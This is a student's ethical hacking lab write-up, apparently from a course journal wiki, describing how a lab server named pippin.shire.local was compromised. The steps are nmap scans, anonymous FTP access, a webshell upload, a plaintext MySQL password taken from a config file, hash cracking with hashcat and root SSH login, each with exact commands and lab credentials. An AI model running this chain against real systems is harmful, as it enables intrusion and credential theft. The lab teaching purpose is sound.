Lab 7.1 Exploiting Pipping - JimKnee-Champ/Ethical-Hacking-Journal GitHub Wiki

nslookup pippin.shire.local 10.0.5.22 (all we were given was the name of the server, so we use nslookup to find the given server name from the known dns server) - This told us pippin's ip was 10.0.5.25.

sudo nmap -sV 10.0.5.25 (service/version scan on the targeted ip.) this revealed the ports 21,22,and 80 were open, running ftp, ssh, and http respectively.

sudo nmap -A -p 21,22,80 10.0.5.25 (detailed scan on the specified ports) this showed information about each service, namely that port 21, running ftp, seemed vulnerable/misconfigured.

sudo nmap -A -p 21 --script-args ftp-anon.maxlist=-1 10.0.5.25 (lists all files on the main directory for the ftp port) The scanned ftp port listed many files and directories, likely stemming from a single directory the service was based out of. This command listed all of those rather than truncating them.

we can log into pippin.shire.local by using the anonymous ftp connections. command: ftp 10.0.5.25 (the ip address of shire.local) username: anonymous password: none, just hit enter

We are able to upload any file we want to the system, and navigate to relevant directories using a browser and url directory traversal. We can upload a reverse shell that will allow us to execute commands as a non privileged user on the system. Using this, we can cat out the contents of various files.

We can also pull files off the system. relevant commands when connected with ftp: put, pull. will push and pull files from the directory you began ftp commincation with the server.

the localsetting.php file had the system admin's MYSQL account root password stored in plaintext. We are able to use this to access the mysql database and display relevant information. This was also their main account password. We are now able to ssh into the server as peregrin.took.

We can use the mysql database to display the contents of the "user" table, which contain relevant username and password info, namely for the admin account.

TO crack the hash, change the format from "pbkdf2:sha512:30000:64:RjELMZH8kG0rs+qSJkmMnQ==:7vGhAdzcOMmRPW/MEoMlF+SJ68zJy+FQ5SFpmuGGJt1erhLunw9/ecHTAxXue+7xlnW7nHyB9AbBkLWNA1c6cw==" to "sha512:30000:RjELMZH8kG0rs+qSJkmMnQ==:7vGhAdzcOMmRPW/MEoMlF+SJ68zJy+FQ5SFpmuGGJt1erhLunw9/ecHTAxXue+7xlnW7nHyB9AbBkLWNA1c6cw==" essentially, remove everything before the sha512 and also remove the 64 after it.

This was exceptionally slow on the kali system, so I downloaded hashcat on my personal machine and ran it the same way i did on kali. Thankfully, the program doesnt function any differently on windows than on linux (or so it appeared to me) and the process completed in less than 1 minute total, revealing the password.

Using ssh, it was possible to log into the root account (meaning they hadnt secured the server against root access using ssh, another security flaw) and display the root flag as we had the peregrin user's flag.

list of commands in total:

nmap commands for network discovery listed above

ftp 10.0.5.25 (user: anonymous, password: (none))

put webshell.php (webshell.php being in the directory the connection was initiated from)

get (relevant filename) (filename on system)

ssh (username)@(ip address) - in this case, [email protected] (password pippintook, from the LocalSettings.php file we getted from the server)

mysql -u (username) -p (for password) - username was root, password was entered after the command as "pippintook"

show databases;

use (database name); - in this case, mariawiki_db, again from the local settings file

show tables;

describe (table name); - in this case, the user table

select (table attribute, table attribute) from (table name); in this case, user_name and user_password FROM user

hashcat -m 12100 (input file, just the string without the username as described above) -w 4 -a 0 -o (output file) (wordlist)

hashcat -m 12100 shireadmin.txt -w 4 -a 0 -o shirecracked rockunderscore.txt

ssh [email protected] - use the password cracked from the mysql database/table